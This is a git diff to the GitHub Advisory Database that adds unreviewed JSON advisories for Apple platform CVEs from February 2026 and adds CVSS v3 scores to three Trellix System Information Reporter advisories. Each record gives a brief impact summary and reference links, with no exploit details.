.../GHSA-99pv-pwgp-5cm5.json | 37 ++++++++++++ .../GHSA-9mhv-cw55-h9jp.json | 11 +++- .../GHSA-9rvp-ph3g-jg82.json | 29 ++++++++++ .../GHSA-c5gm-v7v7-vjx9.json | 49 ++++++++++++++++ .../GHSA-cm39-88fp-pv6j.json | 37 ++++++++++++ .../GHSA-cpw4-rfmm-h598.json | 41 +++++++++++++ .../GHSA-f24m-jwf4-xpxc.json | 33 +++++++++++ .../GHSA-f3h2-q66h-c9wp.json | 29 ++++++++++ .../GHSA-f7qx-wh9j-7278.json | 37 ++++++++++++ .../GHSA-fqf2-x743-9564.json | 33 +++++++++++ .../GHSA-frmq-2cmp-gh32.json | 45 +++++++++++++++ .../GHSA-g32q-3228-m26p.json | 29 ++++++++++ .../GHSA-gfmx-qqqh-f38q.json | 36 ++++++++++++ .../GHSA-h6jx-x5f4-qmj9.json | 29 ++++++++++ .../GHSA-hjj6-wmh2-qhwj.json | 53 +++++++++++++++++ .../GHSA-hr8m-gc74-4f7w.json | 29 ++++++++++ .../GHSA-hx52-r225-3pxc.json | 37 ++++++++++++ .../GHSA-hxp3-qj63-m9j9.json | 37 ++++++++++++ .../GHSA-j5x8-2r52-c3ff.json | 45 +++++++++++++++ .../GHSA-jhp8-jfxv-5ggj.json | 45 +++++++++++++++ .../GHSA-jhq4-533p-8p4c.json | 45 +++++++++++++++ .../GHSA-m4mv-q6m2-24j4.json | 37 ++++++++++++ .../GHSA-mfw9-vjxf-gvr8.json | 3 +- .../GHSA-mg2x-vmw2-xm7h.json | 37 ++++++++++++ .../GHSA-p47v-wp9g-8362.json | 57 +++++++++++++++++++ .../GHSA-p8ww-f2v2-hj7q.json | 29 ++++++++++ .../GHSA-pmfg-h9xp-96jh.json | 57 +++++++++++++++++++ .../GHSA-pr6p-6x97-5c59.json | 33 +++++++++++ .../GHSA-pxhf-qg7h-8x8m.json | 45 +++++++++++++++ .../GHSA-q5q3-fgwr-rr9h.json | 49 ++++++++++++++++ .../GHSA-qg96-wxg3-3x3h.json | 41 +++++++++++++ .../GHSA-qjq9-mpcc-f8cr.json | 45 +++++++++++++++ .../GHSA-qq3h-f6g7-3484.json | 33 +++++++++++ .../GHSA-r28c-wjwj-4xgv.json | 29 ++++++++++ .../GHSA-r2c9-g9pr-hc37.json | 29 ++++++++++ .../GHSA-r5cf-37x9-4hgv.json | 29 ++++++++++ .../GHSA-r7jp-3wp4-fvf4.json | 29 ++++++++++ .../GHSA-r942-7mj9-p58w.json | 33 +++++++++++ .../GHSA-rfq8-v234-58w4.json | 45 +++++++++++++++ .../GHSA-v9g2-54rr-mxmg.json | 33 +++++++++++ .../GHSA-w65x-hpv6-vv6v.json | 29 ++++++++++ .../GHSA-w82w-6f63-rvgf.json | 33 +++++++++++ .../GHSA-wj8f-mjpv-f78g.json | 57 +++++++++++++++++++ .../GHSA-wp4v-6rrv-wqv9.json | 33 +++++++++++ .../GHSA-wqpg-jwpg-g42c.json | 29 ++++++++++ .../GHSA-wx45-vx6h-76cq.json | 41 +++++++++++++ .../GHSA-wxwg-9693-mqg4.json | 37 ++++++++++++ .../GHSA-xrqq-m9vv-pq36.json | 33 +++++++++++ .../GHSA-xw8j-p597-rjrj.json | 45 +++++++++++++++ 86 files changed, 3136 insertions(+), 7 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-25q2-mm9v-fcj8/GHSA-25q2-mm9v-fcj8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2cmj-fc9r-6h5j/GHSA-2cmj-fc9r-6h5j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2hr4-372m-m24q/GHSA-2hr4-372m-m24q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2jp6-x3f3-3m72/GHSA-2jp6-x3f3-3m72.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2jw9-xm3m-75jh/GHSA-2jw9-xm3m-75jh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2vhc-whvm-6f6g/GHSA-2vhc-whvm-6f6g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3993-26cm-wfhm/GHSA-3993-26cm-wfhm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3fcr-xq7p-rffp/GHSA-3fcr-xq7p-rffp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3frw-32pg-5m86/GHSA-3frw-32pg-5m86.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3jj8-9qpj-6989/GHSA-3jj8-9qpj-6989.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3p5c-6wpr-gh3w/GHSA-3p5c-6wpr-gh3w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3ww4-528c-xcv7/GHSA-3ww4-528c-xcv7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4q59-wccf-6q9r/GHSA-4q59-wccf-6q9r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5fwp-233p-3m7m/GHSA-5fwp-233p-3m7m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-649p-9q32-vwxc/GHSA-649p-9q32-vwxc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6cwx-3f6w-m5ch/GHSA-6cwx-3f6w-m5ch.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6xrf-46c8-4wmj/GHSA-6xrf-46c8-4wmj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-74vw-h65p-vr44/GHSA-74vw-h65p-vr44.json create mode 100644 advisories/unreviewed/2026/02/GHSA-82p2-ccrf-wxw5/GHSA-82p2-ccrf-wxw5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-84wm-58x3-8fvc/GHSA-84wm-58x3-8fvc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8cmp-jqmx-pj7w/GHSA-8cmp-jqmx-pj7w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json create mode 100644 advisories/unreviewed/2026/02/GHSA-926h-3qgq-9w39/GHSA-926h-3qgq-9w39.json create mode 100644 advisories/unreviewed/2026/02/GHSA-934f-cmh4-43m7/GHSA-934f-cmh4-43m7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-946c-234f-fccx/GHSA-946c-234f-fccx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9677-7r6g-3qh2/GHSA-9677-7r6g-3qh2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-96rf-whf9-r5vh/GHSA-96rf-whf9-r5vh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-99pv-pwgp-5cm5/GHSA-99pv-pwgp-5cm5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9rvp-ph3g-jg82/GHSA-9rvp-ph3g-jg82.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cpw4-rfmm-h598/GHSA-cpw4-rfmm-h598.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f24m-jwf4-xpxc/GHSA-f24m-jwf4-xpxc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f3h2-q66h-c9wp/GHSA-f3h2-q66h-c9wp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f7qx-wh9j-7278/GHSA-f7qx-wh9j-7278.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json create mode 100644 advisories/unreviewed/2026/02/GHSA-frmq-2cmp-gh32/GHSA-frmq-2cmp-gh32.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g32q-3228-m26p/GHSA-g32q-3228-m26p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gfmx-qqqh-f38q/GHSA-gfmx-qqqh-f38q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hjj6-wmh2-qhwj/GHSA-hjj6-wmh2-qhwj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hx52-r225-3pxc/GHSA-hx52-r225-3pxc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hxp3-qj63-m9j9/GHSA-hxp3-qj63-m9j9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jhp8-jfxv-5ggj/GHSA-jhp8-jfxv-5ggj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m4mv-q6m2-24j4/GHSA-m4mv-q6m2-24j4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mg2x-vmw2-xm7h/GHSA-mg2x-vmw2-xm7h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r5cf-37x9-4hgv/GHSA-r5cf-37x9-4hgv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r7jp-3wp4-fvf4/GHSA-r7jp-3wp4-fvf4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wx45-vx6h-76cq/GHSA-wx45-vx6h-76cq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json diff --git a/advisories/unreviewed/2025/06/GHSA-5pvc-qgx7-mhr5/GHSA-5pvc-qgx7-mhr5.json b/advisories/unreviewed/2025/06/GHSA-5pvc-qgx7-mhr5/GHSA-5pvc-qgx7-mhr5.json index 5c17071e85b0e..dfa24b5169be4 100644 --- a/advisories/unreviewed/2025/06/GHSA-5pvc-qgx7-mhr5/GHSA-5pvc-qgx7-mhr5.json +++ b/advisories/unreviewed/2025/06/GHSA-5pvc-qgx7-mhr5/GHSA-5pvc-qgx7-mhr5.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5pvc-qgx7-mhr5", - "modified": "2025-06-26T21:31:21Z", + "modified": "2026-02-12T00:31:02Z", "published": "2025-06-26T21:31:21Z", "aliases": [ "CVE-2025-3773" ], "details": "A sensitive information exposure vulnerability in System Information Reporter (SIR) 1.0.3 and prior allows an authenticated non-admin local user to extract sensitive information stored in a registry backup folder.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/06/GHSA-6fjf-g26h-9mff/GHSA-6fjf-g26h-9mff.json b/advisories/unreviewed/2025/06/GHSA-6fjf-g26h-9mff/GHSA-6fjf-g26h-9mff.json index e9255642e6ba7..d1b15a8d10634 100644 --- a/advisories/unreviewed/2025/06/GHSA-6fjf-g26h-9mff/GHSA-6fjf-g26h-9mff.json +++ b/advisories/unreviewed/2025/06/GHSA-6fjf-g26h-9mff/GHSA-6fjf-g26h-9mff.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6fjf-g26h-9mff", - "modified": "2025-06-26T21:31:21Z", + "modified": "2026-02-12T00:31:02Z", "published": "2025-06-26T21:31:21Z", "aliases": [ "CVE-2025-3722" ], "details": "A path traversal vulnerability in System Information Reporter (SIR) 1.0.3 and prior allowed an authenticated high privileged user to issue malicious ePO post requests to System Information Reporter, leading to creation of files anywhere on the filesystem and possibly overwriting existing files and exposing sensitive information disclosure.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/06/GHSA-9c4h-xhg9-x3gj/GHSA-9c4h-xhg9-x3gj.json b/advisories/unreviewed/2025/06/GHSA-9c4h-xhg9-x3gj/GHSA-9c4h-xhg9-x3gj.json index a667f9e4c8f77..23d6f69cb1f07 100644 --- a/advisories/unreviewed/2025/06/GHSA-9c4h-xhg9-x3gj/GHSA-9c4h-xhg9-x3gj.json +++ b/advisories/unreviewed/2025/06/GHSA-9c4h-xhg9-x3gj/GHSA-9c4h-xhg9-x3gj.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9c4h-xhg9-x3gj", - "modified": "2025-06-26T21:31:21Z", + "modified": "2026-02-12T00:31:02Z", "published": "2025-06-26T21:31:21Z", "aliases": [ "CVE-2025-3771" ], "details": "A path or symbolic link manipulation vulnerability in SIR 1.0.3 and prior versions allows an authenticated non-admin local user to overwrite system files with SIR backup files, which can potentially cause a system crash. This was achieved by adding a malicious entry to the registry under the Trellix SIR registry folder or via policy or with a junction symbolic link to files that the user would not normally have permission to acces", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-25q2-mm9v-fcj8/GHSA-25q2-mm9v-fcj8.json b/advisories/unreviewed/2026/02/GHSA-25q2-mm9v-fcj8/GHSA-25q2-mm9v-fcj8.json new file mode 100644 index 0000000000000..b926ffbf0a52b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-25q2-mm9v-fcj8/GHSA-25q2-mm9v-fcj8.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25q2-mm9v-fcj8", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20612" + ], + "details": "A privacy issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20612" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json b/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json new file mode 100644 index 0000000000000..902a65d38cb88 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-26vr-h5vf-58cq", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20674" + ], + "details": "A privacy issue was addressed by removing sensitive data. This issue is fixed in iOS 26.3 and iPadOS 26.3. An attacker with physical access to a locked device may be able to view sensitive user information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20674" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2cmj-fc9r-6h5j/GHSA-2cmj-fc9r-6h5j.json b/advisories/unreviewed/2026/02/GHSA-2cmj-fc9r-6h5j/GHSA-2cmj-fc9r-6h5j.json new file mode 100644 index 0000000000000..496b47a6645b6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2cmj-fc9r-6h5j/GHSA-2cmj-fc9r-6h5j.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cmj-fc9r-6h5j", + "modified": "2026-02-12T00:31:03Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-46300" + ], + "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46300" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2hr4-372m-m24q/GHSA-2hr4-372m-m24q.json b/advisories/unreviewed/2026/02/GHSA-2hr4-372m-m24q/GHSA-2hr4-372m-m24q.json new file mode 100644 index 0000000000000..6dd95336adb96 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2hr4-372m-m24q/GHSA-2hr4-372m-m24q.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2hr4-372m-m24q", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20626" + ], + "details": "This issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 26.3 and iPadOS 26.3, macOS Tahoe 26.3, visionOS 26.3. A malicious app may be able to gain root privileges.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20626" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2jp6-x3f3-3m72/GHSA-2jp6-x3f3-3m72.json b/advisories/unreviewed/2026/02/GHSA-2jp6-x3f3-3m72/GHSA-2jp6-x3f3-3m72.json new file mode 100644 index 0000000000000..0223616481a06 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2jp6-x3f3-3m72/GHSA-2jp6-x3f3-3m72.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2jp6-x3f3-3m72", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20667" + ], + "details": "A logic issue was addressed with improved checks. This issue is fixed in watchOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 26.3 and iPadOS 26.3. An app may be able to break out of its sandbox.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20667" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2jw9-xm3m-75jh/GHSA-2jw9-xm3m-75jh.json b/advisories/unreviewed/2026/02/GHSA-2jw9-xm3m-75jh/GHSA-2jw9-xm3m-75jh.json new file mode 100644 index 0000000000000..c2c0ed33da7f4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2jw9-xm3m-75jh/GHSA-2jw9-xm3m-75jh.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2jw9-xm3m-75jh", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2025-46305" + ], + "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46305" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2vhc-whvm-6f6g/GHSA-2vhc-whvm-6f6g.json b/advisories/unreviewed/2026/02/GHSA-2vhc-whvm-6f6g/GHSA-2vhc-whvm-6f6g.json new file mode 100644 index 0000000000000..a210178ee86a3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2vhc-whvm-6f6g/GHSA-2vhc-whvm-6f6g.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2vhc-whvm-6f6g", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20641" + ], + "details": "A privacy issue was addressed with improved checks. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to identify what other apps a user has installed.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20641" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json b/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json new file mode 100644 index 0000000000000..43e504843be1b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-355c-f243-w6f5", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20669" + ], + "details": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Tahoe 26.3. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20669" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json b/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json new file mode 100644 index 0000000000000..d4979bea0bd98 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-366r-6rjw-f277", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20646" + ], + "details": "A logging issue was addressed with improved data redaction. This issue is fixed in macOS Tahoe 26.3. A malicious app may be able to read sensitive location information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20646" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + 